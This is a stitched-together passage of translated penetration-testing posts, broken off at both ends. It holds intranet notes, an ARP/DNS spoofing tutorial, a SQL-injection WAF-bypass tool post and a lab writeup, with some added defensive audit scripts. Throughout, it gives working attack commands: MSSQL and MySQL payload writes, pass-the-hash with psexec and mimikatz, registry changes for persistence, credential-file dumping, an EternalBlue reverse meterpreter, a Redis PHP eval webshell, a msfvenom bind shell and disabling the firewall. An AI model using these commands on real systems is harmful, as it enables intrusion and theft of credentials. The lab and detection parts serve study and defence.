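    """Stand-in for the instance metadata endpoint. http_tokens is 'optional'
    (default mode) or 'required' (hardened mode, HttpTokens=required)."""

    def __init__(self, http_tokens="optional"):
        self.http_tokens = http_tokens
        self.tokens = set()

    def request(self, method, path, headers=None):
        headers = headers or {}
        if method == "PUT" and path == "/latest/api/token":
            if TTL_HDR not in headers:
                return 400, "missing ttl header"
            tok = secrets.token_hex(16)
            self.tokens.add(tok)
            return 200, tok
        if self.http_tokens == "required" and headers.get(TOKEN_HDR) not in self.tokens:
            return 403, "token required"  # hardened mode rejects token-less reads
        body = META_PATHS.get(path)
        return (200, body) if body is not None else (404, "not found")


def via_ssrf(svc, path):
    """The range's SSRF forwards a plain GET; the caller controls no headers."""
    return svc.request("GET", path)


def via_instance_shell(svc, path):
    """Code running on the instance can do the PUT-then-GET the post shows."""
    _, tok = svc.request("PUT", "/latest/api/token", {TTL_HDR: "21600"})
    return svc.request("GET", path, {TOKEN_HDR: tok})


# The three RAM actions the post used to mint an AdministratorAccess sub-user.
USER_CREATION_ACTIONS = {"ram:CreateUser", "ram:CreateLoginProfile", "ram:AttachPolicyToUser"}


def role_can_mint_admin_user(policy_docs):
    """True if the role's Allow statements cover all three actions, or wildcard them.
    policy_docs are RAM policy JSON strings (Version/Statement/Effect/Action)."""
    granted = set()
    for doc in policy_docs:
        for st in json.loads(doc)["Statement"]:
            if st.get("Effect") != "Allow":
                continue
            acts = st["Action"] if isinstance(st["Action"], list) else [st["Action"]]
            for a in acts:
                if a in ("*", "ram:*"):
                    return True
                granted.add(a)
    return USER_CREATION_ACTIONS <= granted


def audit(http_tokens, policy_docs):
    """Report the two misconfigurations described in 0x03, in a fixed order."""
    findings = []
    if http_tokens != "required":
        findings.append("metadata_http_tokens_not_required")
    if role_can_mint_admin_user(policy_docs):
        findings.append("role_can_create_admin_sub_user")
    return findings


# Constructed policy documents: the system AdministratorAccess shape, and a read-only one.
ADMIN_POLICY = '{"Statement":[{"Action":"*","Effect":"Allow","Resource":"*"}],"Version":"1"}'
READONLY_POLICY = ('{"Statement":[{"Action":["ecs:Describe*","oss:Get*"],"Effect":"Allow",'
                   '"Resource":"*"}],"Version":"1"}')

if __name__ == "__main__":
    for mode in ("optional", "required"):
        svc = MetadataService(mode)
        print(mode, "ssrf:", via_ssrf(svc, CREDS_PATH), "on-box:", via_instance_shell(svc, CREDS_PATH)[0])
    print(audit("optional", [ADMIN_POLICY]), audit("required", [READONLY_POLICY]))
```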
-
Title: Intranet penetration running notes
0x00 Environment

Linux host with www permission. The host cannot reach the external network, so a forward proxy cannot be used. The target is the B-segment intranet.

0x01 Collect information

Use F-Scrack.py to obtain Redis, ES, etc.
PS: F-Scrack.py's mssql brute-force module is inaccurate; you can write a simple one yourself.

    python Scrack.py -h 10.111.1.1-10.111.2.254 -p 3306,5432 -m 200 -t 6

1. Redis

Do not use keys * when there are many keys.
View basic information: master, quantity, version number.
Use scan to view keys:
    scan 0 match * count 100
View the type:
    type key
Hash type:
    hgetall key

2. MySQL

On Windows, first test whether you can write to the plugin directory:
    select @@plugin_dir;
    select hello into outfile plugin_dir;
Then use the udf that comes with msf: first convert it to hexadecimal, then export it to the plugin directory:
    use test;
    set @a=concat('',0xhex_of_exe);
    create table Ghost(data LONGBLOB);
    insert into Ghost values('');
    update Ghost set data=@a;
    select data from Ghost into DUMPFILE dir;
    create function sys_eval returns string soname 'sys_eval.dll';
    drop function sys_eval;  -- Delete after use; develop good habits. Prefer sys_eval and try not to use sys_exec (it will crash).

3. mssql

mssql brute-forcing should be left as late as possible, since the noise is relatively large. After the mssql brute-force succeeds, it is best to use CLR to obtain permissions. Using xp_cmdshell directly will get killed, and 360 will intercept it. With a known mssql user password, certutil and other tools will be intercepted or raise alerts.
You can use the tools provided by mssql itself to write to the hard disk. First enable the stored procedures:

    sp_configure 'show advanced options', 1;
    GO
    RECONFIGURE;
    GO
    sp_configure 'Ole Automation Procedures', 1;
    GO
    RECONFIGURE;

mssql writes large files: for example, an exe or similar is converted to hex first, and then written to the file:

    xxd -plain /tmp/test.exe | tr -d '\n' > /tmp/dll.hex

    declare @hexstring varchar(max);
    set @hexstring='hex after conversion';
    declare @file varbinary(max);
    set @file=(select cast('' as xml).value('xs:hexBinary( substring(sql:variable("@hexstring"), sql:column("t.pos")) )', 'varbinary(max)') from (select case substring(@hexstring, 1, 2) when '0x' then 3 else 0 end) as t(pos));
    select @file;
    declare @init int;
    declare @filepath nvarchar(4000)=N'c:\22.exe';
    EXEC sp_OACreate 'ADODB.Stream', @init OUTPUT; -- An instance created
    EXEC sp_OASetProperty @init, 'Type', 1;
    EXEC sp_OAMethod @init, 'Open'; -- Calling a method
    EXEC sp_OAMethod @init, 'Write', NULL, @file; -- Calling a method
    EXEC sp_OAMethod @init, 'SaveToFile', NULL, @filepath, 2; -- Calling a method
    EXEC sp_OAMethod @init, 'Close'; -- Calling a method
    EXEC sp_OADestroy @init; -- Closed the resources

4. mssql backup

    BACKUP DATABASE db TO DISK='C:\Windows\temp\db.bak' WITH COMPRESSION, INIT, STATS=5;

Split-volume compression:
    rar.exe a -m0 -v100m C:\windows\temp\db.split C:\windows\tasks\db.bak
Download:
    download C:\\windows\temp\\db.split.rar /var/tmp/

6. pth

wmi:
    wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create 'cmd.exe /c ipconfig > d:\result.txt'
Recommended to use wmiexec.vbs: https://github.com/l3m0n/pentest_study/blob/master/tools/wmiexec.vbs
    cscript C:\Windows\Tasks\aliwmi.vbs /cmd ip 'C:\Windows\system32\calc.exe'

msf:
    use exploit/windows/smb/psexec
    show options
    set RHOST 192.168.81.129
    set SMBPass 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF
    set SMBUser Administrator
    show options
    run

mimikatz || Cobalt Strike:
    mimikatz.exe privilege::debug 'sekurlsa::pth /domain: /user:administrator /ntlm:2D20D252A479F485CDF5E171D93985BF /run:cmd.exe'  // pass the hash

psexec:
    psexec /accepteula  // accept the license agreement
    sc delete psexesvc
    psexec \\192.168.1.185 -u pt007 -p admin123 cmd.exe

psexec.vbs:
    cscript psexec.vbs 192.168.1.158 pt007 admin123 'ipconfig'  // remote command execution

sc:
    net use \\192.168.17.138\c$ 'admin123' /user:pt007
    net use
    dir \\192.168.17.138\c$
    copy test.exe \\192.168.17.138\c$
    sc \\192.168.17.138 create test binpath='c:\test.exe'
    sc \\192.168.17.138 start test
    sc \\192.168.17.138 del test

9 ways to remotely execute cmd in Windows: https://xz.aliyun.com/t/5957

0x03 Access is denied

For any account other than RID 500, the token used is a medium token, whether using wmi, psexec or other methods. When using wmiexec, it will report Access is Denied. When dumping hashes, the registry can be modified so that all local administrator group members can connect remotely, as a means of persistence:

    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

RDP PTH

When the dumped hash cannot be cracked, if you use the hash to log in to RDP remotely, the system you log in to needs "Restricted Admin Mode" enabled, which is enabled by default on Windows 8.1 and Windows Server 2012 R2. Windows 7 and Windows Server 2008 require the patches 2871997 and 2973351.

1. Start RDP
    REG ADD 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    REG ADD 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' /v PortNumber /t REG_DWORD /d 0x00000d3d /f  # Listen on port 3389
Turn on 3389:
    wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != '') call setallowtsconnections 1
2. Turn on Restricted Admin mode
    REG ADD 'HKLM\System\CurrentControlSet\Control\Lsa' /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
3. Add firewall rules
    netsh advfirewall firewall add rule name='Remote Desktop' dir=in protocol=TCP localport=3389 action=allow

0x04 Dump passwords

dbeaver

dbeaver6 configuration files (the storage location and decryption method differ between versions):
    # Encrypted password storage location:
    C:\Users\user\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver\credentials-config.json
    # url and username:
    C:\Users\user\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver\data-sources.json
Decryption script: https://gist.github.com/felipou/50b60309f99b70b1e28f6d22da5d8e61
After downloading the script, use python to decrypt credentials-config.json:
    python decrypt.py credentials-config.json
then search for the corresponding IP and username in data-sources.json based on the decrypted id.
The old version stores the password in: C:\Users\users\.dbeaver4\General\.dbeaver-data-source.xml. It can be decrypted directly online at: http://dbeaver-password-decrypter.s3-website-us-west-2.amazonaws.com/

0x05 MobaXterm

There is a .ini file with the corresponding IP information and private key path.
Old version storage: C:\Users\%USERNAME%\AppData\Roaming\MobaXterm
2020 version: C:\Users\%USERNAME%\Documents\MobaXterm

0x05 VSCODE

The configuration file under Windows is at: %APPDATA%\Code\User\settings.json. Storage locations such as notes and ssh configuration can be found from the configuration file.

0x06 Firefox

Master Sanhao has covered this in detail; I chose to use firepwd.py.
Firefox profile directory: %APPDATA%\Mozilla\Firefox\Profiles\
-
Title: Intranet penetration: man-in-the-middle spoofing attacks
ARP Attack

Protocol Introduction

The full name of ARP is Address Resolution Protocol. It is a TCP/IP protocol that obtains physical addresses based on IP addresses. When a host sends information, it broadcasts an ARP request containing the target IP address to all hosts on the network and uses the returned message to determine the target's physical address. After receiving the reply, it stores the IP address and physical address in the local ARP cache and keeps them for a certain period of time; the next request queries the ARP cache directly to save resources. ARP is based on mutual trust between the hosts on the network: any host can send an ARP reply on its own, and when other hosts receive the reply they do not check its authenticity and record it in their local ARP cache. Therefore an attacker can send a forged ARP reply to a host so that the information it sends cannot reach the expected host, or reaches the wrong host. This constitutes ARP spoofing.

Working Principle

Environment assumption:
    Host A: IP address 192.168.1.1, MAC address 0A-11-22-33-44-01
    Host B: IP address 192.168.1.2, MAC address 0A-11-22-33-44-02

Workflow:
Step 1: According to the routing table on Host A, it determines that the forwarding IP address used to reach Host B is 192.168.1.2, and then Host A checks its local ARP cache for the matching MAC address of Host B.
Step 2: If Host A does not find the mapping in its ARP cache, it asks for the hardware address of 192.168.1.2 by broadcasting an ARP request frame to all hosts on the local network; the IP address and MAC address of the source host A are included in the ARP request. Each host on the local network receives the ARP request and checks whether the requested IP address matches its own.
If a host finds that the requested IP address does not match its own, it discards the ARP request.
Step 3: Host B determines that the IP address in the ARP request matches its own, and adds the IP-to-MAC mapping of Host A to its local ARP cache.
Step 4: Host B sends an ARP reply containing its MAC address directly back to Host A.
Step 5: When Host A receives the ARP reply from Host B, it updates its ARP cache with the IP-to-MAC mapping of Host B. The local cache has a lifetime; after it expires, the above process is repeated. Once the MAC address of Host B is determined, Host A can send IP traffic to Host B.

Cache Mechanism

The ARP cache is a buffer used to store IP addresses and MAC addresses. It is essentially an IP address to MAC address mapping table; each entry records the IP address and corresponding MAC address of another host on the network. Each Ethernet or token ring network adapter has its own separate table. When ARP is asked for the MAC address of a known IP address, it first looks in the ARP cache. If the entry exists, the corresponding MAC address is returned directly; if not, an ARP request is sent to query the LAN. To minimize broadcast traffic, ARP keeps the cache of IP-to-MAC mappings for future use. The ARP cache can contain dynamic and static entries. Dynamic entries are added and deleted automatically over time. The potential lifetime of each dynamic ARP cache entry is 10 minutes. Newly added entries are timestamped; if an entry is not used within 2 minutes after it is added, it expires and is deleted from the ARP cache. If an entry is in use, it receives another 2 minutes of lifetime.
If an entry is always in use, it keeps receiving another 2 minutes of lifetime up to the maximum of 10 minutes. Static entries remain in the cache until the computer is restarted.

ARP Spoofing

ARP is based on mutual trust between the hosts on the network. Its design makes the network run more efficiently, but it also has flaws. The ARP address translation table depends on the dynamic updating of cache memory in the computer; that updating is limited by the update cycle, and only the mapping entries for recently used addresses are kept. This gives an attacker an opportunity to modify the address translation table before the cache updates the entry. ARP requests are sent as broadcasts, any host on the network can send an ARP reply on its own, and when other hosts receive the reply they do not check its authenticity and record it in their local MAC address translation table. In this way, the attacker can send a forged ARP reply to the target host, thereby tampering with its local MAC address table. ARP spoofing can cause the target computer to lose communication with the gateway, and it can also redirect communication: all data then passes through the attacker's machine, which forwards the data between the target and the gateway. This way it acts as a 'man in the middle' and can listen to the target without affecting the target's normal Internet access.
Spoofing Practice

Basic environment:
    Attack host: 192.168.174.129, 00:0c:29:39:be:eb
    Normal host: 192.168.174.170, 00:0c:29:08:ad:eb
    Gateway address: 192.168.174.2

Disconnection attack

Step 1: Close port forwarding on the attack host
    # disable
    echo 0 > /proc/sys/net/ipv4/ip_forward
    # enable
    echo 1 > /proc/sys/net/ipv4/ip_forward
Step 2: View the current ARP resolution list on the normal host
Step 3: Ping Baidu on the normal host
    ping www.baidu.com -t
Baidu can be accessed normally.
Step 4: Then cut off the network with arpspoof on the attack host
    Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
    # Parameter explanation:
    -i  Specify the interface to use
    -c  Specify the MAC address used when restoring the ARP configuration. The default is to use the original MAC (that is, after stopping the arpspoof command, the spoofing is undone by default)
    -t  Specify the host to be poisoned. If not specified, it defaults to all hosts on the LAN
    -r  Two-way poisoning (host and target), thus capturing data in both directions (only valid if -t is specified at the same time)
    # Execution example:
    arpspoof -i eth0 -t 192.168.174.170 192.168.174.2
Step 5: You can see that the ping request times out and the browser cannot open www.baidu.com. At the same time, checking the ARP resolution table, you will find that the gateway's MAC address was successfully spoofed and set to the attacker's MAC address.
Step 6: Afterwards the attack is interrupted (because we did not specify the -c parameter before, the original MAC address will be restored). You can see that the ping returns to normal, and the page and ARP table also return to normal.

Image capture

Step 1: Turn on port forwarding, allowing the machine to forward data like a router
    echo 1 > /proc/sys/net/ipv4/ip_forward
Step 2: View the current ARP resolution list on the normal host
Step 3: Access a web page on the normal host
Step 4: Run arpspoof on the attack host with the same parameters as above
    arpspoof -i eth0 -t 192.168.174.170 192.168.174.2
Step 5: Afterwards, driftnet obtains the image data left by the victim user when visiting the website.

Login credentials

Step 1: Here we continue from the image capture part above; we use ettercap on the attack host to capture communication data
    ettercap -Tq -i eth0
Step 2: Simulate a third-party FTP service
Step 3: The user accesses the third-party FTP service and authenticates
Step 4: The attacker successfully captures the user's account and password

Spoofing Extensions

Here we add a few commonly used ARP spoofing methods and the use of ARP spoofing tools on Windows~

NetFuke

Test environment:
    Target host: 192.168.174.170 (Win 7)
    Attack host: 192.168.174.169 (Windows Server 2003)
    Gateway address: 192.168.174.2

Spoofing process
Step 1: Run the NetFuke software on the attack host and configure sniffing (the network card here must recognize the IP address, otherwise ARP spoofing cannot be performed)
Step 2: Configure ARP spoofing
Step 3: Plugin command parameter settings
Step 4: Turn on ARP spoofing

Attack Detection

Introduction to the XArp tool

XArp is a popular ARP firewall abroad. It can help users establish a dedicated detection system and use advanced techniques to detect and handle various ARP attacks on the network. For example, using ARP spoofing, an attacker can eavesdrop on all your network traffic, including emails and passwords, without any of it being discovered. XArp uses active and passive methods to detect such attacks.

Attack detection
Step 1: Turn on NetFuke to carry out the ARP spoofing attack
Step 2: Then on the XArp side you can see the alarm information and related records
PS: Personally I feel this tool is not that good~

Defense measures

Defense against ARP spoofing mainly starts from the following two aspects:
a. Block the propagation of forged packets: this approach works at the level of network devices such as switches or routers. Taking a switch as an example, it binds the switch port, MAC address and IP address to generate a DAI (Dynamic ARP Inspection) table. If the host on a port sends a packet that does not match its entry in the DAI table, the switch can either disconnect the port or discard the packet.
b. The victim does not accept forged packets: this approach works from the user's side. First, do not connect to unfamiliar networks. Second, users can install an ARP firewall on the device. Technical staff can create static ARP entries (suitable for network environments that do not change often and have a small number of hosts). Windows users can use the command arp -s <ip address> <mac address> to bind statically.

DNS Attack

Domain Name System

DNS (Domain Name System) is the domain name resolution protocol.
The domain name system maps domain names and IP addresses to each other in the form of a distributed database. Simply put, DNS is used to resolve domain names. With DNS we no longer need to remember annoying IP addresses, and can use relatively easy-to-remember domain names to access the server. Even if the server changes its IP address, we can still access it through the domain name, which makes using the Internet more convenient. When we enter www.baidu.com into the browser, the following query process takes place:

1. The client queries the local DNS server for www.baidu.com.
2. The local DNS server checks its local database. Since there is no record for the baidu.com domain, it passes the query to a root DNS server and asks it to resolve the host name.
3. The root DNS server returns the IP address of the DNS server responsible for the 'com' domain to the local DNS server.
4. The local DNS server sends the request to the DNS server responsible for the 'com' domain. According to the request, the IP address of the DNS server responsible for the 'baidu.com' domain is returned to the local DNS server.
5. The local DNS server sends a request to the DNS server responsible for the 'baidu.com' domain. Since this server has a record for www.baidu.com, it returns the IP address of www.baidu.com to the local DNS server.
6. The local DNS server sends the IP address of www.baidu.com to the client.
7. After the domain name is resolved successfully, the client sends the HTTP request to the web server.
8. The web server responds to the client's request, and the client can access the target host.

DNS Spoofing

DNS plays such an important role on the Internet, but when the DNS protocol was designed, the designers did not consider some security issues, which led to security risks and defects in DNS.
DNS spoofing is a very serious security defect in the design of the DNS protocol. First, the spoofer sends a constructed ARP reply packet to the target machine. After the ARP spoofing succeeds, it sniffs the DNS request packet sent by the target, analyzes the packet to obtain the transaction ID and port number, and sends a constructed DNS reply packet to the target. When the target receives the DNS reply packet, it finds that the ID and port number are all correct, so the domain name and corresponding IP address in the reply are saved into its DNS cache table, and the real DNS reply packet is discarded when it arrives later.

Spoofing Practice

Test environment:
    Attack host: 192.168.174.129
    Target host: 192.168.174.170

Simple test
Step 1: Test the network connectivity of the attack host
Step 2: Then start the Apache service on the attack host and construct a phishing page. Here it is simplified into a normal HTML page; the local test effect is as follows
Step 3: Find the etter.dns file and modify the configuration, pointing www.al1ex.com to the local IP address
    locate etter.dns
    leafpad /etc/ettercap/etter.dns
Step 4: Start spoofing with ettercap
    ettercap -G
Then enable DNS spoofing
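The ARP spoofing above shows up on the victim as the gateway's MAC changing to the attacker's MAC, and one MAC answering for two IPs; the defense section suggests static entries and an ARP firewall. The following is an added example (not part of the original post) of the detection side: it parses successive ARP-table snapshots and alerts on exactly those two symptoms. The gateway's real MAC is not given in the post, so the sample snapshots use a placeholder for it; the attacker MAC and addresses are the ones from the lab setup.

```python
import re
from collections import defaultdict

# One ARP-table entry: an IPv4 address followed somewhere on the line by a MAC in
# Windows (00-0c-29-..) or Linux (00:0c:29:..) notation, so both `arp -a` and
# `ip neigh` output parse.
_ENTRY = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3})\s.*?\b([0-9A-Fa-f]{2}(?:[:-][0-9A-Fa-f]{2}){5})\b"
)


def parse_arp_table(text):
    """Return a list of (ip, mac) pairs, MACs normalized to aa:bb:cc:dd:ee:ff."""
    entries = []
    for line in text.splitlines():
        m = _ENTRY.search(line)
        if m:
            entries.append((m.group(1), m.group(2).lower().replace("-", ":")))
    return entries


class ArpMonitor:
    """Tracks IP->MAC bindings over successive ARP-table snapshots and raises alerts
    when a binding changes (critical for the gateway) or one MAC claims several IPs,
    which is what the arpspoof run above produces on the victim."""

    def __init__(self, gateway_ip, gateway_mac=None):
        self.gateway_ip = gateway_ip
        self.bindings = {}                    # ip -> mac last seen
        self.ips_by_mac = defaultdict(set)    # mac -> set of ips it answers for
        if gateway_mac:                       # pin the known-good gateway MAC
            self.observe(gateway_ip, gateway_mac)

    def observe(self, ip, mac):
        """Record one binding (an arp -a row or a sniffed ARP reply); return alerts."""
        mac = mac.lower().replace("-", ":")
        alerts = []
        old = self.bindings.get(ip)
        if old is not None and old != mac:
            self.ips_by_mac[old].discard(ip)
            level = "CRITICAL" if ip == self.gateway_ip else "WARNING"
            alerts.append(f"{level}: {ip} moved from {old} to {mac}")
        self.bindings[ip] = mac
        self.ips_by_mac[mac].add(ip)
        if len(self.ips_by_mac[mac]) > 1:
            alerts.append(f"WARNING: {mac} answers for {sorted(self.ips_by_mac[mac])}")
        return alerts

    def check_snapshot(self, table_text):
        alerts = []
        for ip, mac in parse_arp_table(table_text):
            alerts.extend(self.observe(ip, mac))
        return alerts


# Constructed `arp -a` output from the normal host (192.168.174.170) before and during
# the spoof. 00-0c-29-aa-bb-cc stands in for the gateway's real MAC (not in the post);
# 00-0c-29-39-be-eb is the attack host's MAC from the lab setup.
ARP_BEFORE = """Interface: 192.168.174.170 --- 0xb
  Internet Address      Physical Address      Type
  192.168.174.2         00-0c-29-aa-bb-cc     dynamic
  192.168.174.129       00-0c-29-39-be-eb     dynamic
"""
ARP_DURING = """Interface: 192.168.174.170 --- 0xb
  Internet Address      Physical Address      Type
  192.168.174.2         00-0c-29-39-be-eb     dynamic
  192.168.174.129       00-0c-29-39-be-eb     dynamic
"""


def run_demo():
    """Feed both snapshots to a monitor pinned to the gateway; returns (quiet, alerts)."""
    mon = ArpMonitor("192.168.174.2", "00-0c-29-aa-bb-cc")
    quiet = mon.check_snapshot(ARP_BEFORE)    # matches the pinned binding: no alerts
    alerts = mon.check_snapshot(ARP_DURING)   # gateway now resolves to the attacker
    return quiet, alerts


if __name__ == "__main__":
    for alert in run_demo()[1]:
        print(alert)
```

When the attack stops and the real MAC is restored (step 6 above), the monitor reports another gateway move, so a change back to the pinned MAC is also worth logging rather than silently accepting.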
-
Title: Super Injection Tool for SQL Blind Injection Quick Data Output
Some friends in the group often run into problems with SQL injection. Sometimes there is a WAF, sometimes it is blind, and sometimes they don't know where to start. Today I share a tool, the Super Injection Tool. Download address: https://github.com/shack2/SuperSQLInjectionV1

Case 1: Blind injection with a WAF

As shown in the figure below, a single quote causes an error, and the error is echoed. This is a typical Boolean blind injection. As long as we can construct a statement such as and 1=1 or or 1=1, data can be extracted. Here the database is MySQL, where the if function is usually used for Boolean injection. A WAF usually does not block a bare if(), but will block something like if(1,1,1). If it is blocked, you can replace 1 with 11-10 and 2 with 12-10. Then just run it straight through the Super Injection Tool. The WAF bypass rule is the following; it is relatively simple.

Case 2

The and constructed in Case 1 is there so the Super Injection Tool can identify the content returned by the page, distinguishing the field of the correct page for 1=1 from the field of the wrong page for 1=2. Normal tools cannot recognize the injection point, so you need to specify the field and give the tool a basis for Boolean injection! Let's look at another example; I hope you can understand what I mean. The figure below is still MySQL, successfully constructing an if. The request is pasted into the Super Injection Tool. This tool only tests 1=1 and 1=2 when testing blind injection, so set the payload at the first position of the if, look at the box in the lower right corner, and the echo value of the correct page is identified. Then the data comes out!

Case 3

Here is an mssql type, that is, SQL Server. The site has a WAF. Testing oR 1=1 and 1=2 is not intercepted. Use 1=1 to construct the request packet; the SQL injection tool can recognize the Boolean value, and then the data comes out without effort.

Original link: https://mp.weixin.qq.com/s/jrv1ZLjZ3IbtloRCXWDo-Q
-
Title: vulntarget shooting range series-a-writeup
Network Configuration

External network WIN7:
    ip1: 192.168.127.91/255.255.255.0, gw: 192.168.127.2 (NAT mode)
    ip2: 10.0.20.98 - vmnet1 (host-only mode)
Domain member host:
    10.0.20.99 - vmnet1 (host-only mode)
    10.0.10.111 - vmnet2 (host-only mode)
Domain controller:
    10.0.10.110 - vmnet2 (host-only mode)
Password configuration:
    Win7: win7/admin
    win2016: Administrator/Admin@123, vulntarget.com\win2016 Admin#123
    win2019: vulntarget.com\administrator Admin@666

Information Collection

Scan hosts:
    arp-scan -l
Scanning the surviving hosts in the same network segment discovers a surviving host: 192.168.127.91
Scan the ports of the surviving target:
    nmap -sC -T4 192.168.127.91
Found that the target system is Win7 and port 445 is open. Try to use Eternal Blue (ms17-010) against the target system.

Intranet host penetration

Enter the commands in kali:
    msfconsole
    msf6 > search 17-010
    msf6 > use 0
    msf6 > set payload windows/x64/meterpreter/reverse_tcp
    msf6 > set lport 6666
    msf6 > set lhost 192.168.127.129
    msf6 > set rhosts 192.168.127.91
    msf6 > run
    meterpreter > shell
    C:\Windows\System32> ipconfig
I found some garbled output, so I set the code page:
    C:\Windows\System32> CHCP 65001     # 65001 is the UTF-8 code page
    C:\Windows\System32> ipconfig       # Found two network segments: 192.168.127 and 10.0.20
    C:\Windows\System32> whoami         # The current user's permission is system
    C:\Windows\System32> tasklist /svc  # View the processes; no antivirus in the system
    C:\Windows\System32> exit           # Exit the shell command terminal
    meterpreter > load kiwi             # Load the mimikatz module
    meterpreter > creds_all             # Get the login credentials of all current users; the user name is win7 and the password is admin

Web penetration

Accessing http://192.168.127.91/ directly, it is found to be Tongda OA. View the version number of Tongda OA.
The current version is 11.3: http://192.168.127.91/inc/expired.php
Search for the Tongda 11.3 file inclusion vulnerability through search engines: https://blog.csdn.net/hackzkaq/article/details/115900500
Use the one-click graphical tool to obtain a webshell, and connect successfully using AntSword. The current user under AntSword's command terminal also has system permission.

Lateral penetration

The shell obtained from the exploited process is extremely fragile, so it is necessary to migrate the shell into a stable process on the target machine; this needs no write to disk, which makes the penetration harder to detect. After running the automatic migration command (run post/windows/manage/migrate), the system automatically finds a suitable process and migrates into it.
    meterpreter > run post/windows/manage/migrate   # Migrated from spoolsv.exe (PID 1080) to notepad.exe (PID 4800)
View the local network subnets:
    meterpreter > run get_local_subnets
Add a dynamic route:
    meterpreter > run autoroute -s 10.0.20.0/24
or:
    meterpreter > background
    msf6 > sessions
    msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/autoroute
    msf6 exploit(windows/smb/ms17_010_eternalblue) > set session 1
    msf6 exploit(windows/smb/ms17_010_eternalblue) > run
    meterpreter > background
Discover surviving hosts:
    msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/arp_scanner
    msf6 exploit(windows/smb/ms17_010_eternalblue) > set session 1
    msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.0.20.1-254
    msf6 exploit(windows/smb/ms17_010_eternalblue) > run
Another surviving host was found: 10.0.20.99. Enable the socks5 proxy:
    msf6 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/server/socks_proxy
    msf6 auxiliary(server/socks_proxy) > run
Port scanning: first modify the /etc/proxychains4.conf configuration file
    vim /etc/proxychains4.conf
    socks5 127.0.0.1 1080
Scan the commonly used ports of the target IP through nmap:
    proxychains nmap -sT -Pn 10.0.20.99 -p22,23,80,139,445,1433,3306,3389,6379,8080
Found that the 10.0.20.99 host has ports 6379 and 80 open.
Here a local socks5 proxy client, the Proxifier software, is used; scanning through dirsearch found that the target has a phpinfo.php sensitive information page:
    python3 dirsearch.py -l url.txt -t 10 -e * -i 200,302 --format csv -o C:\Users\backlion\Desktop\dirsearch-master\xxx.com.csv
or run dirsearch through proxychains on the attack machine kali:
    proxychains python dirsearch.py -u http://10.0.20.99 -i 200
    proxychains dirsearch -u "http://10.0.20.99" --proxy=socks5://127.0.0.1:1080 -t 5
Visiting the phpinfo.php page reveals the absolute path of the website: C:/phpStudy/PHPTutorial/WWW/
    http://10.0.20.99/phpinfo.php
    http://10.0.20.99/l.php

Redis Unauthorized Access

Remote connection without a password through the redis-cli command:
    proxychains redis-cli -h 10.0.20.99
Redis writes a webshell:
    10.0.20.99:6379> CONFIG set dir 'C:/phpStudy/PHPTutorial/WWW/'   # Switch to the absolute path where the shell can be written
    10.0.20.99:6379> set x '\n\n\n?php @eval($_POST['x']);\n\n\n'     # Write the one-line webshell
    10.0.20.99:6379> config set dbfilename shell.php                   # Set the file name to shell.php
    10.0.20.99:6379> save
Here AntSword on the local host goes through the proxy and connects to the webshell. The current user permission is system.

Upload the MSF backdoor

Generate a bind-shell payload:
    msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=3333 -f exe > shell.exe
Use AntSword to upload shell.exe to 10.0.20.99 and execute it. Configure the listener:
    use exploit/multi/handler
    set payload windows/x64/meterpreter/bind_tcp
    set lport 3333
    set RHOST 10.0.20.99
    run
Close the firewall:
    netsh firewall set opmode mode=disable
Run shell.exe in the AntSword command terminal.
Collect hosts on the same network segment:
    meterpreter > arp
Scan the 10.0.10.110 network segment; migrate the process:
    run post/windows/manage/migrate
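The Redis step above works only because the instance accepts unauthenticated remote clients and still exposes CONFIG SET, which lets the dump file be redirected into the web root. The following is an added example, not part of the writeup, that audits a redis.conf for exactly those settings; the two sample configurations are constructed, and the check assumes Redis 3.2 or later (older builds, including many Windows ports, have no protected-mode directive at all).

```python
def parse_redis_conf(text):
    """Return ({directive: value}, {RENAMED_COMMAND: new_name}) from redis.conf text.
    Full-line '#' comments are skipped; Redis has no inline comments, so a '#' inside
    a value (e.g. a requirepass) is kept."""
    conf, renamed = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, rest = line.partition(" ")
        key, rest = key.lower(), rest.strip()
        if key == "rename-command":
            cmd, _, new = rest.partition(" ")
            renamed[cmd.upper()] = new.strip().strip('"')   # "" means the command is disabled
        else:
            conf[key] = rest.strip('"')
    return conf, renamed


def audit_redis_conf(text):
    """Return a list of findings; an empty list means none of the weak settings
    that the CONFIG SET dir / dbfilename / SAVE chain relies on are present."""
    conf, renamed = parse_redis_conf(text)
    findings = []
    bind = conf.get("bind", "").split()            # absent bind = every interface
    if not bind or "0.0.0.0" in bind or "*" in bind:
        findings.append("bind: reachable on all interfaces; bind 127.0.0.1 or the internal address only")
    if conf.get("protected-mode", "yes").lower() != "yes":   # default is yes (Redis >= 3.2)
        findings.append("protected-mode: disabled; set protected-mode yes")
    if not conf.get("requirepass"):
        findings.append("requirepass: not set; any client that can connect has full access")
    if renamed.get("CONFIG", "CONFIG") == "CONFIG":
        findings.append('rename-command: CONFIG reachable under its default name; use rename-command CONFIG ""')
    return findings


# Constructed: roughly what the 10.0.20.99 host must have looked like (remote access,
# no password), next to a hardened version of the same file.
WEAK_CONF = """# constructed sample, not the target's real file
bind 0.0.0.0
protected-mode no
port 6379
dir ./
"""

HARDENED_CONF = """bind 127.0.0.1
protected-mode yes
port 6379
requirepass "REPLACE-WITH-A-LONG-RANDOM-SECRET"
rename-command CONFIG ""
dir ./
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
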